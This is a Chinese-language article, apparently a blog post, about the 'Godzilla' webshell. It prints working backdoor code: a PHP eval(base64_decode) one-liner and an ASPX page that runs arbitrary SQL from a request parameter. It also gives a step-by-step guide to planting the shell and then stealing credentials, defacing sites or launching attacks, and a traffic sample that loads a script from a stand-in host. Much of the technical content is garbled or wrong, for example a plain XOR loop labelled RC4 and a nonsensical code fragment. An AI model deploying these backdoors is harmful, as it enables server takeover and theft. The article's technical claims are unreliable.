一、哥斯拉webshell特征
哥斯拉webshell是一种常见的后门程序,它通常以ASP、PHP等网页技术为基础,用于对被攻陷的网站进行远程管理和操控。它的特征包括:
1、文件名一般以“Gozilla”、“Hacker”、“Webshell”等常见词语为名。
<%if(--g){g=a+b;};\\文件名为Gozilla.asp
<?php if (isset($_REQUEST['mr94'])) { eval(base64_decode($_REQUEST['mr94']));}?>\\文件名为hacker.php
2、常见的哥斯拉webshell会在代码中使用Base64、RC4等加密方式,以增加攻击者对代码的控制。
$key = "chr";//RC4密钥
$string = base64_decode($_POST["xxx"]);//解密
for ($i=0; $i<strlen($string); $i++) {
$c = ord($key[$i % strlen($key)]);
$string[$i] = $string[$i] ^ $c; \\RC4加解密
}
3、哥斯拉webshell的代码中一般会有很多无用代码,包括注释、空格、换行等,是为了增加代码的复杂度,防止被发现。
//注释掉的代码
/*
$str = str_replace(array("\r\n", "\n", "\r"), '
', $str);
*/
//大量的空格和换行
$a=b+c;
$d = $a + $b;
$e = $d - $c;
二、哥斯拉webshell远程管理
哥斯拉webshell可以通过管理页面进行远程操控,其远程管理包括:
1、文件管理:可以对被攻陷的网站进行文件上传、删除、修改等操作。
//文件上传
<form enctype="multipart/form-data" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
请选择要上传的文件: <br />
<input name="userfile" type="file" />
<input type="submit" value="上传" />
</form>
2、数据库管理:管理员可以通过哥斯拉webshell对网站后台数据库进行操作。
//查询数据库
<?php
$conn=mysqli_connect("localhost","username","password","database");
// Check connection
if (mysqli_connect_errno()){
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
$result = mysqli_query($conn,"SELECT * FROM table");
while($row = mysqli_fetch_array($result)){
echo $row['name'] . " " . $row['age'];
echo "
";
}
mysqli_close($conn);
?>
3、系统管理:可以进行服务器信息查看、进程管理、权限提升、系统命令操作等。
//查看系统进程
<?php
$output = shell_exec('ps aux');
echo "$output
";
?>
三、哥斯拉webshell加密
哥斯拉webshell在代码中常常使用Base64、RC4等加密算法,以防止别人恶意攻击和篡改。
1、Base64加解密:
//加密
$str = base64_encode($str);
//解密
$str = base64_decode($str);
2、RC4加解密:
//加密
$key = "chr";
$string = 'hello world';
for ($i=0; $i<strlen($string); $i++) {
$c = ord($key[$i % strlen($key)]);
$string[$i] = $string[$i] ^ $c;
}
$string = base64_encode($string);
//解密
$string = base64_decode($string);
for ($i=0; $i<strlen($string); $i++) {
$c = ord($key[$i % strlen($key)]);
$string[$i] = $string[$i] ^ $c;
}
echo $string;//输出"hello world"
四、哥斯拉webshell作者
哥斯拉webshell的作者并不明确,但是由于其代码常常出现在黑客攻击中,被认为是黑客的创作。
五、哥斯拉webshell aspx
哥斯拉webshell也有适用于ASP.NET的版本,其代码和功能与常见的ASP、PHP版本类似,使用方式和攻击方式也相似。以下是一个简单的ASP.NET版本哥斯拉webshell的代码:
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>
<% if (Request["cmd"] != null) {%>
<%string cmd = Request["cmd"].ToString(); %>
<%string sConn = "Data Source=(local);Initial Catalog=master;Integrated Security=True";%>
<%System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(sConn);%>
<%SqlCommand sqlcmd = new SqlCommand(cmd, conn);%>
<%conn.Open();%>
<%SqlDataReader dr = sqlcmd.ExecuteReader();%>
<%StringBuilder str = new StringBuilder();%>
<%while (dr.Read()) {%>
<%for (int i = 0; i < dr.FieldCount; i++) {%>
<%str.Append(dr[i].ToString()); %>
<%} %>
<%str.Append("<br/>"); %>
<%} %>
<%Response.Write(str);%>
<% } else { %>
<form method="post">
<input type="text" name="cmd" size="40" value="whoami" />
<input type="submit" value="执行" />
</form>
<% } %>
六、哥斯拉webshell流量分析
哥斯拉webshell的流量分析可以通过Wireshark等工具进行分析,以下是一段哥斯拉webshell流量分析的代码和解读:
POST /a/b/c/Gozilla.asp HTTP/1.1\r\n
Host: www.xxx.com\r\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Accept-Encoding: gzip, deflate\r\n
Connection: close\r\n
Referer: http://www.xxx.com/index.asp\r\n
Upgrade-Insecure-Requests: 1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 172\r\n
\r\n
k3=<script>document.writeln(unescape('%3C%66%69%6C%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%78%78%78%2E%63%6F%6D%2F%63%2E%6A%73%22%20%3E%3C%2F%66%69%6C%65%3E'))</script>&password=&url=&login=&cmd=
其中:
1、请求方式为Post。
POST /a/b/c/Gozilla.asp HTTP/1.1\r\n
2、请求的目标文件名为Gozilla.asp。
POST /a/b/c/Gozilla.asp HTTP/1.1\r\n
3、请求的内容为加密后的代码,其中k3参数即为哥斯拉webshell的关键字。
k3=<script>document.writeln(unescape('%3C%66%69%6C%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%78%78%78%2E%63%6F%6D%2F%63%2E%6A%73%22%20%3E%3C%2F%66%69%6C%65%3E'))</script>&password=&url=&login=&cmd=
七、哥斯拉webshell加密过程
哥斯拉webshell的加密过程通常使用Base64、RC4等加密算法,以下是一段PHP版本哥斯拉webshell加密过程的代码:
$key = "chr";
$string = 'hello world';
for ($i=0; $i<strlen($string); $i++) {
$c = ord($key[$i % strlen($key)]);
$string[$i] = $string[$i] ^ $c;
}
$string = base64_encode($string);
echo $string;//输出加密后的字符串
//解密过程:先Base64解密,再RC4解密
八、哥斯拉webshell使用教程
哥斯拉webshell使用教程包括:如何获取哥斯拉webshell、如何上传哥斯拉webshell、如何连接和使用哥斯拉webshell进行攻击等。以下是一种常见的哥斯拉webshell使用教程:
1、获取哥斯拉webshell。
可以通过各种漏洞和手段获取哥斯拉webshell,常见的方式包括利用SQL注入漏洞、文件上传漏洞、远程执行命令漏洞等方法。
2、上传哥斯拉webshell。
将获取到的哥斯拉webshell上传至目标服务器,可以通过FTP、Web管理页、Web表单等方式进行上传。
3、连接和使用哥斯拉webshell进行攻击。
连接哥斯拉webshell并使用其远程管理功能进行攻击,包括在上传后执行恶意代码、获取管理员账号密码、篡改网站内容、钓鱼攻击、DDoS攻击等。
九、拿webshell
拿webshell是指攻击者通过各种方式获取到网站服务器的权限、管理员账号密码等,并上传哥斯拉webshell等后门程序进入服务器,以达到对网站的控制和操纵。拿webshell的常见方式包括利用漏洞、暴力破解、社会工程学、钓鱼攻击等。
十、webshell购买选取
哥斯拉webshell并非唯一一种webshell,有许多其他的webshell可供选择,购买webshell也不是一件合法和道德的事情。在这里,我们呼吁广大网络参与者要遵守互联网法律法规,不要从事任何危害国家和民族安全、社会稳定和他人利益的违法犯罪活动。
